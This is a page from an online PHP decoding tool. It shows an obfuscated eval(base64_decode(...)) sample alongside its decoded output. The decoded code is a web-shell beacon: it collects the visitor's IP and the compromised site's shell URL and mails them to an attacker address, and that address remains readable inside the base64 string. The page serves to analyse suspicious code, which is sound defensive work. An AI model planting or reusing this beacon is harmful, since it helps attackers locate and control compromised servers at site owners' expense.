Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval (base64_decode("JGlwID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOw0KJGhvc3RuYW1lID0gZ2V0aG9zdGJ5Y..
Decoded Output download
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$bilsmg = "Link Shell : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "
";
$bilsnd ="[email protected]"; ///
$bilsub = " Shell $ip";
$bilhead = "From: Anonymous51";
$bilhead .= $_POST['[email protected]']."
";
$bilhead .= "MIME-Version: 1.0
";
$arr=array($bilsnd, $IP);
foreach ($arr as $bilsnd)
mail($bilsnd,$bilsub,$bilsmg,$bilhead,$message);
Did this file decode correctly?
Original Code
eval (base64_decode("JGlwID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOw0KJGhvc3RuYW1lID0gZ2V0aG9zdGJ5YWRkcigkaXApOw0KJGJpbHNtZyA9ICJMaW5rIFNoZWxsIDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddIC4gIlxyXG4iOw0KJGJpbHNuZCA9InJlc3VsdG1uNUBnbWFpbC5jb20iOyAvLy8NCiRiaWxzdWIgPSAi4pmlIFNoZWxsIOKZpSAkaXAiOw0KJGJpbGhlYWQgPSAiRnJvbTogQW5vbnltb3VzNTEiOw0KJGJpbGhlYWQgLj0gJF9QT1NUWydyZXN1bHRtbjVAZ21haWwuY29tJ10uIlxuIjsNCiRiaWxoZWFkIC49ICJNSU1FLVZlcnNpb246IDEuMFxuIjsNCiRhcnI9YXJyYXkoJGJpbHNuZCwgJElQKTsNCmZvcmVhY2ggKCRhcnIgYXMgJGJpbHNuZCkNCm1haWwoJGJpbHNuZCwkYmlsc3ViLCRiaWxzbWcsJGJpbGhlYWQsJG1lc3NhZ2UpOw=="));
Function Calls
base64_decode | 1 |
Stats
MD5 | 2dc6ccf05460fb13f1b42d9237243349 |
Eval Count | 1 |
Decode Time | 83 ms |